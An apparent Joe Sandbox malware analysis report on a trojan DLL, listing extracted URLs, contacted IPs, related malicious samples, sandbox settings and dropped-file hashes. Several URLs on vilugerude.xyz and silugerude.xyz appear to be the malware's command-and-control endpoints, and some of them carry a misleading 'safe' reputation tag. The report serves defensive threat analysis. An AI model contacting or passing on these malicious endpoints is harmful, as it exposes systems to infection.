http://vilugerude.xyz/palok/ISxtPb9NBDRdKdPIDnGulH/UHMvfd9n0X2gt/HgBUH102/d1m0OPwBZ0XynInWe6FU1aI/20	~DFF281750E0F709160.TMP.5.dr, {8BC3AC80-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
http://vilugerude.xyz/palok/dFnfMK1xAnp5I7t/YmapWF7tOTYN7Dd_2B/6kHZ1aN0G/zjxUimz2MEw0rWfqLZLJ/gCkKKi	rundll32.exe, 00000003.00000003.1009779943.0000000003034000.00000004.00000001.sdmp, ~DFB72C5D5D1A9C9D82.TMP.5.dr, {9F80080B-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_promotionalstripe_na	de-ch[1].htm.10.dr	false		high
https://onedrive.live.com;Fotos	52-478955-68ddb2ab[1].js.10.dr	false	Avira URL Cloud: safe	low
http://vilugerude.xyz/palok/02XIlHxdbtKM8P3i3ca/47BqsC6_2FhAXQycTT8tDA/RUNfA0sZ_2BZr/1jh8HIyV/8yUbmY	{9F800807-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_TopMenu&auth=1&wdorigin=msn	de-ch[1].htm.10.dr	false		high
http://vilugerude.xyz/palok/vUdO_2B4IZ3J_2Bd6F3sVbz/0bLr6U_2BT/ty33Mhp8Qlrf5CraM/knAI6s31dF0P/5ITH10	{8BC3AC84-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://office.live.com/start/Word.aspx?WT.mc_id=MSN_site;Excel	52-478955-68ddb2ab[1].js.10.dr	false		high
http://ogp.me/ns/fb#	de-ch[1].htm.10.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-ss&ued=htt	de-ch[1].htm.10.dr	false		high
https://outlook.live.com/mail/deeplink/compose;Kalender	52-478955-68ddb2ab[1].js.10.dr	false		high
https://res-a.akamaihd.net/__media__/pics/8000/72/941/fallback1.jpg	{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/urteil-mit-signalwirkung-unternehmer-erh%c3%a4lt-1	de-ch[1].htm.10.dr	false		high
https://www.skyscanner.net/g/referrals/v1/cars/home?associateid=API_B2B_19305_00002	de-ch[1].htm.10.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_Recent&auth=1&wdorigin=msn	52-478955-68ddb2ab[1].js.10.dr	false		high
http://vilugerude.xyz/palok/ZSXFTmnkcje5EOH/umoJg5Byr3I9szhZzJ/RAjbLNU7_/2BKMDUk3G_2Bo_2FwnsZ/OrQwr5	~DFC13F73B5108036FD.TMP.5.dr, {8BC3AC82-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://web.vortex.data.msn.com/collect/v1	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/wie-sich-der-z%c3%bcrcher-kantonsrat-durch-seine-b	de-ch[1].htm.10.dr	false		high
http://www.reddit.com/	msapplication.xml4.5.dr	false		high
https://www.skype.com/	de-ch[1].htm.10.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=travelnavlink	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/nachrichten/regional	de-ch[1].htm.10.dr	false		high
https://onedrive.live.com/?qt=allmyphotos;Aktuelle	52-478955-68ddb2ab[1].js.10.dr	false		high
https://amzn.to/2TTxhNg	de-ch[1].htm.10.dr	false		high
https://www.skype.com/go/onedrivepromo.download?cm_mmc=MSFT_2390_MSN-com	52-478955-68ddb2ab[1].js.10.dr	false		high
https://client-s.gateway.messenger.live.com	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.msn.com/de-ch/	de-ch[1].htm.10.dr	false		high
https://office.live.com/start/PowerPoint.aspx?WT.mc_id=MSN_site	52-478955-68ddb2ab[1].js.10.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1	{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.awin1.com/cread.php?awinmid=15168&awinaffid=696593&clickref=de-ch-edge-dhp-river	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch	de-ch[1].htm.10.dr	false		high
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_store&m	de-ch[1].htm.10.dr	false		high
https://twitter.com/i/notifications;Ich	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.awin1.com/cread.php?awinmid=11518&awinaffid=696593&clickref=dech-edge-dhp-infopa	de-ch[1].htm.10.dr	false		high
https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&http	de-ch[1].htm.10.dr	false		high
https://www.sway.com/?WT.mc_id=MSN_site&utm_source=MSN&utm_medium=Topnav&utm_campaign=link;PowerPoin	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp&item=deferred_page%3a1&ignorejs=webcore%2fmodules%2fjsb	de-ch[1].htm.10.dr	false		high
http://www.youtube.com/	msapplication.xml7.5.dr	false		high
http://ogp.me/ns#	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/news/other/eine-autoposer-fahrt-war-so-laut-wie-ein-presslufthammer/ar-BB1	de-ch[1].htm.10.dr	false		high
https://onedrive.live.com/?qt=mru;OneDrive-App	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/alle-sagen-du-siehst-so-gut-aus-doch-der-long-covi	de-ch[1].htm.10.dr	false		high
https://www.skype.com/de	52-478955-68ddb2ab[1].js.10.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-me	de-ch[1].htm.10.dr	false		high
https://www.skype.com/de/download-skype	52-478955-68ddb2ab[1].js.10.dr	false		high
http://vilugerude.xyz/palok/taR_2BUDt4igM2RX/qZ890U_2FvXmpm7/kLlTmzjbCaxzLI30UD/sG2rHuNAE/XyrX_2Fzhy	~DF1901F2BDB9BBEDC1.TMP.5.dr, {9F800809-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/?wt.mc_id=oo_msn_msnhomepage_header	de-ch[1].htm.10.dr	false		high
http://vilugerude.xyz/palok/CW13K5mE2c3xbRAfZePcI/XEak48G8SmMzV00N/TmMgf_2FUC_2FO8/q1mZ7RFRjJFdb0E2U	{9F80080F-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr, ~DFBDDF96D7C9F8EE76.TMP.5.dr	false	Avira URL Cloud: safe	unknown
http://www.hotmail.msn.com/pii/ReadOutlookEmail/	52-478955-68ddb2ab[1].js.10.dr	false		high
https://onedrive.live.com;OneDrive-App	52-478955-68ddb2ab[1].js.10.dr	false	Avira URL Cloud: safe	low
https://click.linksynergy.com/deeplink?id=xoqYgl4JDe8&mid=46130&u1=dech_mestripe_office&	de-ch[1].htm.10.dr	false		high
https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	false		high
http://www.amazon.com/	msapplication.xml.5.dr	false		high
https://www.onenote.com/notebooks?WT.mc_id=MSN_OneNote_QuickNote&auth=1	52-478955-68ddb2ab[1].js.10.dr	false		high
http://www.twitter.com/	msapplication.xml5.5.dr	false		high
https://office.live.com/start/Excel.aspx?WT.mc_id=MSN_site;Sway	52-478955-68ddb2ab[1].js.10.dr	false		high
http://silugerude.xyz/palok/JYNgnm_2BBHAequLwRjE0/wog2aPyjIrhfiChj/_2F7KNmTOp7gcHK/jNoiBVFK7FGrcvPg_	{92BC32FA-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
http://silugerude.xyz/palok/Ypgl4JI_2FR/m0yEq7_2B7ljWe/BPm0RVhpDIfFWYr2d3BFy/aXhI5T_2B9mwNkry/hFC_2F	~DF6E75D50C571952C5.TMP.5.dr, {7ECFB244-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/vendorlist/googleData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	false		high
https://outlook.com/	de-ch[1].htm.10.dr	false		high
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.10.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://silugerude.xyz/palok/TFAutzbu/gCe3ncCBLMH7DreC61qLPHX/ngaLnwVCvh/xXteQjB63wWsF2t6A/Zz_2BRALS7	~DF29CFFC13F95711AB.TMP.5.dr, {7ECFB246-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.10.dr	false		high
http://vilugerude.xyz/palok/t9KapG5Lp7Zt_2Fa57QG/GX7NNpbipoY4mmC8m9o/47gVROA6RCGhiLCLu_2F0K/y86ol3pt	{92BC32FE-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://tools.applemediaservices.com/api/badges/download-on-the-app-store/black/en-us?"	de-ch[1].htm.10.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/%c3%a4rger-%c3%bcber-auto-poser-klagen-%c3%bcber-f	de-ch[1].htm.10.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.10.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	{3BB1EF45-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false		high
https://sp.booking.com/index.html?aid=1589774&label=dech-prime-hp-shoppingstripe-nav	de-ch[1].htm.10.dr	false		high
https://www.ebay.ch/?mkcid=1&mkrid=5222-53480-19255-0&siteid=193&campid=5338626668&t	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/homepage/api/modules/fetch"	de-ch[1].htm.10.dr	false		high
http://silugerude.xyz/palok/BCk7mFxSRy/Qm0SzTs5dMXdNL8SU/P_2BkhEGcRW5/U9Vx3mh5hRK/dX0HNPUxJl8j6m/IQf	~DF350590C2B9D41CB2.TMP.5.dr, {8BC3AC88-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://mem.gfx.ms/meversion/?partner=msn&market=de-ch"	de-ch[1].htm.10.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.nytimes.com/	msapplication.xml3.5.dr	false		high
https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&ver=%272.1%27&a	de-ch[1].htm.10.dr	false		high
https://www.msn.com/de-ch/nachrichten/vermischtes/in-z%c3%bcrich-k%c3%b6nnen-sich-nun-auch-personen-	de-ch[1].htm.10.dr	false		high
https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.html	iab2Data[1].json.10.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.bidstack.com/privacy-policy/	iab2Data[1].json.10.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/en/download/	52-478955-68ddb2ab[1].js.10.dr	false		high
https://www.ricardo.ch/?utm_source=msn&utm_medium=affiliate&utm_campaign=msn_mestripe_logo_d	de-ch[1].htm.10.dr	false		high
http://vilugerude.xyz/palok/neoLoiiKtwHl6QdM4A/f0O2DxWQo/5EJl2Tz8iA7cOU69VgBA/IeUG6sell9ZjI6yQKow/fY	{9F80080D-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
http://vilugerude.xyz/palok/qo_2FTJl/jnoEfVMzZHt3_2BMW0xDKGO/M1Kxv2lNpc/7gbEDrc_2F2egCapG/TuTROOPwVO	~DFD692E6FF3D6732D0.TMP.5.dr, {9F800811-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com/de-ch/news/other/querulant-k%c3%a4mpft-erfolgreich-gegen-hausverbot/ar-BB1g5LzJ?	de-ch[1].htm.10.dr	false		high
https://twitter.com/	de-ch[1].htm.10.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24903118&epi=ch-de	de-ch[1].htm.10.dr	false		high
https://outlook.live.com/calendar	52-478955-68ddb2ab[1].js.10.dr	false		high
http://vilugerude.xyz/palok/aOnuW4Kc8kOdYhrgG/HHSmkSFK_2Fd/FqiAyDyS_2B/Bifl3Bed0SdPBr/pMym6LPCFFnLXB	~DF5B84FB0897B0685F.TMP.5.dr, {8BC3AC86-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://onedrive.live.com/#qt=mru	52-478955-68ddb2ab[1].js.10.dr	false		high
https://clkde.tradedoubler.com/click?p=245744&a=3064090&g=24952290&epi=dech	de-ch[1].htm.10.dr	false		high
http://vilugerude.xyz/favicon.ico	imagestore.dat.5.dr	false	Avira URL Cloud: safe	unknown
https://www.msn.com?form=MY01O4&OCID=MY01O4	de-ch[1].htm.10.dr	false		high
https://support.skype.com	52-478955-68ddb2ab[1].js.10.dr	false		high
http://vilugerude.xyz/palok/ByknSZ2tON9683wB1nz_2/FXwcC_2Ftu5SOLf_/2B2lhXejD0yHkC3/naPotBkzM8oI0dYk3	~DFFCDBC08326237A5C.TMP.5.dr, {92BC32FC-A871-11EB-90EB-ECF4BBEA1588}.dat.5.dr	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.20.185.68	geolocation.onetrust.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	399641
Start date:	29.04.2021
Start time:	00:29:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	laka4.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@77/155@26/1
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 86.6% (good quality ratio 82.1%) Quality average: 79.3% Quality standard deviation: 29%
HCA Information:	Successful, ratio: 100% Number of executed functions: 91 Number of non-executed functions: 52
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Excluded IPs from analysis (whitelisted): 13.107.3.254, 104.43.139.144, 13.107.246.254, 13.64.90.137, 13.88.21.125, 88.221.62.148, 168.61.161.212, 204.79.197.203, 204.79.197.200, 13.107.21.200, 92.122.213.231, 92.122.213.187, 65.55.44.109, 184.30.24.22, 152.199.19.161, 2.20.142.209, 2.20.142.210, 20.190.159.138, 40.126.31.139, 40.126.31.141, 40.126.31.143, 40.126.31.1, 40.126.31.6, 40.126.31.135, 20.190.159.134, 104.42.151.234, 20.82.210.154, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129, 20.82.209.183 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, e11290.dspg.akamaiedge.net, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, a1999.dscg2.akamai.net, s-ring.s-9999.s-msedge.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, s-9999.s-msedge.net, blobcollector.events.data.trafficmanager.net, t-ring.t-9999.t-msedge.net, cs9.wpc.v0cdn.net, www.tm.lg.prod.aadmsa.trafficmanager.net, au.download.windowsupdate.com.edgesuite.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, 1.microsoft.com, go.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, asd.microsoft.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, t-ring.msedge.net, e607.d.akamaiedge.net, login.msa.msidentity.com, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Execution Graph export aborted for target rundll32.exe, PID 6676 because there are no executed function Execution Graph export aborted for target rundll32.exe, PID 6932 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
00:31:26	API Interceptor	1x Sleep call for process: rundll32.exe modified
00:32:22	API Interceptor	1x Sleep call for process: loaddll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.20.185.68	n1D13QHGzh.dll	Get hash	malicious	Browse
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse
	ZTuZr7UXKB.dll	Get hash	malicious	Browse
	7iqFc3DymH.dll	Get hash	malicious	Browse
	Ftbf1ZqULE.dll	Get hash	malicious	Browse
	7CED0B0A92826F1C1E453A75081436AFEF64CE3825885.dll	Get hash	malicious	Browse
	7CDEFQVbLt.dll	Get hash	malicious	Browse
	APRemittanceAdvice.xlsx	Get hash	malicious	Browse
	cock.dll	Get hash	malicious	Browse
	ClearDDrop.dll	Get hash	malicious	Browse
	qTqsVN1PB5.dll	Get hash	malicious	Browse
	KdLJVb0Aoi.dll	Get hash	malicious	Browse
	36n6PEjkoB.dll	Get hash	malicious	Browse
	APRemittanceAdvice.xlsx	Get hash	malicious	Browse
	pasteCounterArray.dll	Get hash	malicious	Browse
	plumbus.rik.dll	Get hash	malicious	Browse
	1.dll	Get hash	malicious	Browse
	ghnrope2.dll	Get hash	malicious	Browse
	80000.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
hblg.media.net	n1D13QHGzh.dll	Get hash	malicious	Browse	23.57.80.37
	n1D13QHGzh.dll	Get hash	malicious	Browse	23.57.80.37
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse	184.30.24.22
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse	184.30.24.22
	ZTuZr7UXKB.dll	Get hash	malicious	Browse	23.57.80.37
	7iqFc3DymH.dll	Get hash	malicious	Browse	184.30.24.22
	LYyR4s55ga.dll	Get hash	malicious	Browse	184.30.24.22
	Ftbf1ZqULE.dll	Get hash	malicious	Browse	23.57.80.37
	XNXkvaIarc.dll	Get hash	malicious	Browse	23.57.80.37
	B9ECF028C9852A52CD1006E34AF3ACB7F5A6A486796AB.dll	Get hash	malicious	Browse	184.30.24.22
	7CED0B0A92826F1C1E453A75081436AFEF64CE3825885.dll	Get hash	malicious	Browse	184.30.24.22
	15b65ccfeced9c5ae3359db9d3a0e68ad0201912b65a0.dll	Get hash	malicious	Browse	184.30.24.22
	7CDEFQVbLt.dll	Get hash	malicious	Browse	23.57.80.37
	b52c0640957e5032b5160578f8cb99f9b066fde4f9431.dll	Get hash	malicious	Browse	184.30.24.22
	Cybr-681.dll	Get hash	malicious	Browse	23.57.80.37
	Cybr-681.dll	Get hash	malicious	Browse	23.57.80.37
	cock.dll	Get hash	malicious	Browse	104.80.21.70
	ClearDDrop.dll	Get hash	malicious	Browse	104.80.21.70
	ClearDDrop.dll	Get hash	malicious	Browse	104.80.21.70
	qTqsVN1PB5.dll	Get hash	malicious	Browse	92.122.146.68
contextual.media.net	n1D13QHGzh.dll	Get hash	malicious	Browse	23.57.80.37
	n1D13QHGzh.dll	Get hash	malicious	Browse	23.57.80.37
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse	184.30.24.22
	NativeMessagingDispatcher.dll	Get hash	malicious	Browse	184.30.24.22
	ZTuZr7UXKB.dll	Get hash	malicious	Browse	23.57.80.37
	7iqFc3DymH.dll	Get hash	malicious	Browse	184.30.24.22
	LYyR4s55ga.dll	Get hash	malicious	Browse	184.30.24.22
	Ftbf1ZqULE.dll	Get hash	malicious	Browse	23.57.80.37
	XNXkvaIarc.dll	Get hash	malicious	Browse	23.57.80.37
	B9ECF028C9852A52CD1006E34AF3ACB7F5A6A486796AB.dll	Get hash	malicious	Browse	184.30.24.22
	7CED0B0A92826F1C1E453A75081436AFEF64CE3825885.dll	Get hash	malicious	Browse	184.30.24.22
	15b65ccfeced9c5ae3359db9d3a0e68ad0201912b65a0.dll	Get hash	malicious	Browse	184.30.24.22
	7CDEFQVbLt.dll	Get hash	malicious	Browse	23.57.80.37
	b52c0640957e5032b5160578f8cb99f9b066fde4f9431.dll	Get hash	malicious	Browse	184.30.24.22
	Cybr-681.dll	Get hash	malicious	Browse	23.57.80.37
	Cybr-681.dll	Get hash	malicious	Browse	23.57.80.37
	cock.dll	Get hash	malicious	Browse	104.80.21.70
	ClearDDrop.dll	Get hash	malicious	Browse	104.80.21.70
	ClearDDrop.dll	Get hash	malicious	Browse	104.80.21.70
	qTqsVN1PB5.dll	Get hash	malicious	Browse	92.122.146.68

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	FedEx Shipment Address Update Form2021.html	Get hash	malicious	Browse	172.67.141.111
	wKYTg7Gp6P.exe	Get hash	malicious	Browse	104.17.63.50
	medline PO No. 9100002286.exe	Get hash	malicious	Browse	104.21.19.200
	PaymentNotification.vbs	Get hash	malicious	Browse	104.16.154.36
	Mga2NdfMyb.exe	Get hash	malicious	Browse	104.17.63.50
	EtnlEBRJwT.exe	Get hash	malicious	Browse	104.17.63.50
	T4QllcPRsl.exe	Get hash	malicious	Browse	104.21.6.252
	Telex_Copy.html	Get hash	malicious	Browse	104.16.18.94
	b304a312_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.12.31
	Ha11NppGrb.exe	Get hash	malicious	Browse	104.21.85.176
	Wh00Ny9HXk.exe	Get hash	malicious	Browse	172.67.188.154
	ZRpmP5qEC1.exe	Get hash	malicious	Browse	172.67.188.154
	NIxm9vbD6u.exe	Get hash	malicious	Browse	104.17.62.50
	Setup.exe	Get hash	malicious	Browse	104.23.98.190
	4G842SDA.exe	Get hash	malicious	Browse	172.67.188.154
	Bestellen.exe	Get hash	malicious	Browse	172.67.208.174
	PR#270473.exe	Get hash	malicious	Browse	104.16.13.194
	VM_04_28_22.HTM	Get hash	malicious	Browse	104.18.11.207
	SkKcQaHEB8.exe	Get hash	malicious	Browse	162.159.130.233
	Halkbank_Ekstre_20210426_080203_744632.pdf.exe	Get hash	malicious	Browse	172.67.188.154

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	ACH WlRE PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	104.20.185.68
	#Ud83c#Udd95 #04400 Insurancemail.htm	Get hash	malicious	Browse	104.20.185.68
	ACH WlRE PAYMENT REMITTANCE.xlsx	Get hash	malicious	Browse	104.20.185.68
	Telex_Copy.html	Get hash	malicious	Browse	104.20.185.68
	wendy.klawon@coldwellbanker.com.htm	Get hash	malicious	Browse	104.20.185.68
	VM_04_28_22.HTM	Get hash	malicious	Browse	104.20.185.68
	#Ud83d#Udcde Maerskdrilling.com AudioMessage_10-86588.htm	Get hash	malicious	Browse	104.20.185.68
	n1D13QHGzh.dll	Get hash	malicious	Browse	104.20.185.68
	n1D13QHGzh.dll	Get hash	malicious	Browse	104.20.185.68
	INV0010.html	Get hash	malicious	Browse	104.20.185.68
	Y8G0OTN7.htm	Get hash	malicious	Browse	104.20.185.68
	ATT50064.html	Get hash	malicious	Browse	104.20.185.68
	Fraud Case.docx	Get hash	malicious	Browse	104.20.185.68
	New%20order%20contract.html	Get hash	malicious	Browse	104.20.185.68
	Remittance_Advice_-7889x_pdf.HTml	Get hash	malicious	Browse	104.20.185.68
	Purchase Payment PPY029618.htm	Get hash	malicious	Browse	104.20.185.68
	Release-Block.Messages.html	Get hash	malicious	Browse	104.20.185.68
	Hanglung872.html	Get hash	malicious	Browse	104.20.185.68
	Information!.docx	Get hash	malicious	Browse	104.20.185.68
	Final_report_202110.htm	Get hash	malicious	Browse	104.20.185.68

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1819
Entropy (8bit):	4.926528858959695
Encrypted:	false
SSDEEP:	48:LFFFFFFFFcuFcuFcuFcuxQuFcuFB2FB2FB2FB2bFiuFiuFiuFiubJFu6Fuq:RDDDxxxxxzxH2H2H2H2bbbbbb2/q
MD5:	4B8B4B912A81364DB51008E80E0EEBB1
SHA1:	3E9FAC9FF9710403DD734B6E1682FAA7054F69BE
SHA-256:	35E3BF09536F6DBE793A58B45C19FC5805F06D987232E8E1DB48C4628045A26B
SHA-512:	98EB06045D7D523A1D24A18585F26D287AE426AAB60E4076602A3586328937C69A812D821DAAFDA00F340609A25D8BA214F540F30FAD5C47486743D60B0B6A48
Malicious:	false
Preview:	<root></root><root><item name="HBCM_BIDS" value="{}" ltime="67185168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67185168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67185168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67185168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67305168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67305168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67305168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67305168" htime="30882942" /><item name="mntest" value="mntest" ltime="70105168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="67305168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="70665168" htime="30882942" /></root><root><item name="HBCM_BIDS" value="{}" ltime="70665168" htime="30882942" /></root><ro

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{3BB1EF43-A871-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	587832
Entropy (8bit):	2.6880153950003973
Encrypted:	false
SSDEEP:	384:r5kmNYk4kGkz3f9q7vt7pcC/mNalgxVxSl5RWgcRcoq9w7c8wKyN3Vl9WPcGIR/e:RwlEjSzdbLcZ
MD5:	D2BE391E37FD8E2D7C0C4663906157BD
